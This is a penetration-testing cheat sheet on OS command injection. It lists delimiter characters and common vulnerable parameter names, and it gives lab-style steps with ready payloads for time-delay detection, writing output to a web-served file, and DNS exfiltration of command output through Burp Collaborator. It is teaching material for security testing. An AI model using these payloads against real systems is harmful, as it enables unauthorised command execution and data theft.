💎Command Injection
CMD injection Nuclei template Payload
%26ls||id%26
https://vulnerable-website/endpoint?parameter=%26ls||id%26How to Detect and Exploit Them?
Imagine you are testing the parameters of the following URL during a pentest:
https://vulnerable-website/endpoint?parameter=123 To detect if the source code is not protecting against command injection, we can try a couple of methods:
Insert special characters to detect Delimiter:
We can inject some special characters to see if the application blocks anything that could be used for command injection:
&
;
Newline (0x0a or \n)
&&
|
||
??In case the application doesn’t throw any error messages, we can try injecting our command after using one of these delimiters.
https://vulnerable-website/endpoint?parameter=1|whoami----------------------------------------------------------------
Detecting Blind OS command injection:
Time delays
Most of the OS command injections are Blind, which doesn’t give any output for the executed command. To verify the vulnerability, after detecting allowed special characters, we can verify the command injection using time delays as below:
https://vulnerable-website/endpoint?parameter=x||ping+-c+10+127.0.0.1||----------------------------------------------------------------
Redirecting output
You can also redirect the output of the command in an output file and then retrieve the file on your browser. A payload similar to the following can be used:
https://vulnerable-website/endpoint?
parameter=||whoami>/var/www/images/output.txt||----------------------------------------------------------------
OOB (Out Of Band) Exploitation
You can also trigger an OOB network interaction with an external server such as Burp Collaborator. A payload similar to the following can be used:
https://vulnerable-website/endpoint?parameter=x||nslookup+burp.collaborator.address||Or you can exfiltrate the output of your command using a payload similar to the following:
https://vulnerable-website/endpoint?parameter=||nslookup+`whoami`.burp.collaborator.address||The most common parameters that can be consider while testing for Command injection can be found below:
cmd
exec
command
execute
ping
query
jump
code
reg
do
func
arg
option
load
process
step
read
function
req
feature
exe
module
payload
run
print
----------------------------------------------------------------
OS command injection, simple case
Use Burp Suite to intercept and modify a request that Calls the Function query.
One by One Modify the Every parameter in the request body, giving it the value 1|whoami.
Observe that the response contains the name of the current user.
-------------------------------------------------------------
Blind OS Command injection with time delays
Use Burp Suite to intercept and modify a request that Calls the Function query.
One by One Modify the Every parameter like email parameter, changing it to:email=x||ping+-c+10+127.0.0.1||
Observe that the response takes 10 seconds to return.
-------------------------------------------------------------
Blind OS command injection with output redirection
Use Burp Suite to intercept and modify a request that Calls the Function query.
One by One Modify the Every parameter like email parameter, changing it to:email=||whoami>/var/www/images/output.txt||
Now use Burp Suite to intercept and modify the request that loads an image of a product.
Modify the filename parameter, changing the value to the name of the file you specified for the output of the injected command:
filename=output.txt
Observe that the response contains the output from the injected command.
-------------------------------------------------------------
Blind OS command injection with out-of-band interaction
Use Burp Suite to intercept and modify a request that Calls the Function query.
One by One Modify the Every parameter like email parameter, changing it to:email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
Right-click and select "Insert Collaborator payload" to insert a Burp Collaborator subdomain where indicated in the modified email parameter.
-------------------------------------------------------------
Blind OS command injection with out-of-band data exfiltration
Use Burp Suite to intercept and modify a request that Calls the Function query.
Click "Copy to clipboard" to copy a unique Burp Collaborator payload to your clipboard.
One by One Modify the Every parameter like email parameter, changing it to:email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||
Go back to the Collaborator tab, and click "Poll now". You should see some DNS interactions that were initiated by the application as a result of your payload.
-------------------------------------------------------------
Last updated